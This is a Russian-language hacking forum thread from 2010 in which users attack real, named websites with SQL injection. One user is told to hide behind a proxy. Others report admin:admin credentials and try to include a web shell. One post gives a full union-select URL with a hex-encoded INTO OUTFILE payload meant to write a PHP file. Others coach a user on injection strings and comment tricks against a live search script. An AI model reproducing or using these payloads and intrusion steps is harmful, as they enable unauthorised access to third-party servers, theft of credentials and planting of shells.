
15.01.2010, 03:36
|
|
Banned
Регистрация: 05.09.2008
Сообщений: 1
С нами:
9306355
Репутация:
-5
|
|
я понимаю что это вроди как не по теме. Да и целая тема подобная на мой вопрос уже есть. но все спрошу здесь:
Вот начал я изучать sql инъекции недавно. Что мне за это грозит в плане проблем (в том числе и креминально-адменистративных). Я просто посылаю всякие там запросы к БД. узнаю версию, имена таблиц, полей, логов, пасов в них. Но ничево вредоносного не делаю. даже хеши на стараюсь разкодировать. Просто занимаюсь этим в целях общего развития. Я так понимаю что они там могут анализировать все запросы которые к ним поступаю ну или по крайней мере те в которых содаржаться слова select, union и т.д. И без проблем могут узнать мой IP, а из него номер телефона и адресс. Как вы думаете они это могут, а если могут то станут? (я ведь им ниче плохогоо не зделал).
|
|
|

15.01.2010, 03:47
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
2 020963
Юзай прокси и не будет подобных проблем.
я понимаю что это вроди как не по теме.
это плохо, что понимаешь, но все равно пишешь
Что мне за это грозит в плане проблем (в том числе и креминально-адменистративных)
тебя могут "кр еминально" наказать, т.ч. заготавливай крем.
|
|
|

15.01.2010, 03:49
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
С нами:
8593628
Репутация:
18
|
|
Сообщение от 020963
я понимаю что это вроди как не по теме. Да и целая тема подобная на мой вопрос уже есть. но все спрошу здесь:
Вот начал я изучать sql инъекции недавно. Что мне за это грозит в плане проблем (в том числе и креминально-адменистративных). Я просто посылаю всякие там запросы к БД. узнаю версию, имена таблиц, полей, логов, пасов в них. Но ничево вредоносного не делаю. даже хеши на стараюсь разкодировать. Просто занимаюсь этим в целях общего развития. Я так понимаю что они там могут анализировать все запросы которые к ним поступаю ну или по крайней мере те в которых содаржаться слова select, union и т.д. И без проблем могут узнать мой IP, а из него номер телефона и адресс. Как вы думаете они это могут, а если могут то станут? (я ведь им ниче плохогоо не зделал).
- Конечно настучать могут и должны это делать в целях своей же безопасности)
- Ну станут это ищо как сказать .. все зависит от руководства(владелеца) сервера. Больше шансов получить если сайт на котором тестиш уязвимости есть крупным проектом!
|
|
|

15.01.2010, 17:30
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
http://dtis.ru/index.php?module=Static_Docs&func=view&f=fdfdfd.ht ml
получем ошибку
location : /var/www/vhosts/dtis.ru/httpdocs/modules/Static_Docs/data/fdfdfd.html
ну судя по всему это инклуд, хотя хз...
пытаюсь приинклудить шелл, но ошибка остается...
в чем проблема?
и второй вопрос.
имя и пароль из БД admin;admin
админка /admin (но потом идет редирект на http://admin801.securesites.net/cgi-bin/manage.pl/index.html
также имеется директория конфиг.пхп , но походу она пуста), пхпинфо тоже присутсвует...
phpmyadmin в однименно диретории...
реально ли тут применить "читалку" и попасть в пхпмай админ или каким либо другим образом, если да, то как?
Последний раз редактировалось jecka3000; 15.01.2010 в 20:01..
|
|
|

15.01.2010, 21:08
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
http://adm in801.securesites.net/risk2.tar а это случаем не екап сайта?
попробывал залить через двойной запрос..
http://admin801.securesites.net/story.php?id=-19469+union+select+0x2d3120756e696f6e2073656c65637 420312c312c332c342c352c362c372c382c392c31302c31312 c31322c31332c31342c31352c31362c31372c31382c3139206 6726f6d206d7973716c2e7573657220696e746f206f7574666 96c6520272f746d702f7465737474322e70687027,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user--+
Но что-то не хочет лить даже в /tmp, странно..Может что пропустил подуставший...Хотя обычный подзапрос типа union select 1,2,3..19 from mysql.user where name = 'root', работает на ура.
Второй вариант, читаешь конфиг, заходишь в phpmyadmin и заливаешь шелл ) я уже  Скажу по секрету, папка с правами там есть 
Последний раз редактировалось v1d0qz; 16.01.2010 в 00:11..
|
|
|

15.01.2010, 21:52
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
вот вопрос таков:
в ответ
Software error:
DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1
поставил ') или комбинаации не пашет.
Прошу совета
|
|
|

15.01.2010, 23:15
|
|
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
С нами:
11114426
Репутация:
129
|
|
Сообщение от YuNi|[c
вот вопрос таков:
в ответ
поставил ') или комбинаации не пашет.
Прошу совета
Как понять комбинация не пашет? Ты подставил только это?Покажи полностью строчку которую ты подставляешь в уязвимый скрипт?
Переформулируй пожалуйста вопрос, с более точной конкретикой описаний действий и что ты хочешь получить в результате.
PS "В правильно поставленном вопросе, половина ответа на него" (с) Не помню кто ...
|
|
|

16.01.2010, 13:52
|
|
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
С нами:
11114426
Репутация:
129
|
|
to jokester
Прошу прошения,действительно пропустил в SQL запросе '' при использование LIKE.
А теперь непосредственно по теме.
Вот ошибка из самого первого поста
Сообщение от YuNi|[c
Software error:
DBD::mysql::db selectrow_array failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1
Если взять такой запрос:
SELECT title FROM content WHERE User LIKE ('%$q%')
и передать параметр q=' , то вылетит другая ошибка:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Что показывает не соответствие ошибок с постом пользователя YuNi|[c. Для получения такой же ошибки, как в посте пользователя должен иметь место фактор,когда переменная не обрамлена в одинарные кавычки ... исходя из этого вряд ли в том запросе присутствует LIKE оператор или присутствует, но уже после уязвимой переменной ...
|
|
|

15.01.2010, 23:59
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
ну например если делать запрос /search.cgi?q='+order+by+100-- просто без ошибок открывается обшая категория и на order+by+1 тоже такое. Думал редир но не похожа на того.
карочи на ' ругается и показывает ')
|
|
|

16.01.2010, 00:43
|
|
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
С нами:
11114426
Репутация:
129
|
|
to YuNi|[c
Основываясь на ошибке, можно предположить, что параметр 'q' не обрамлен в одинарные кавычки в запросе ... следовательно запрос к базе можно составить и без ее использования
Например: ?q=1) union select 1,2,3,4,5/*
Так пройдет только без LIKE условия, если запрос будет примерно таким
Код:
mysql_query("SELECT title FROM content WHERE (LIKE %$q%)")
То /* не обрежет %) ... запрос выполнится и не вернется никакого результата... что бы обрезать %) в LIKE запросе за место /* используй #
Только тут походу блинд,так что можешь начинать подбирать 
Последний раз редактировалось [NiGHT]DarkAngel; 16.01.2010 в 00:51..
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|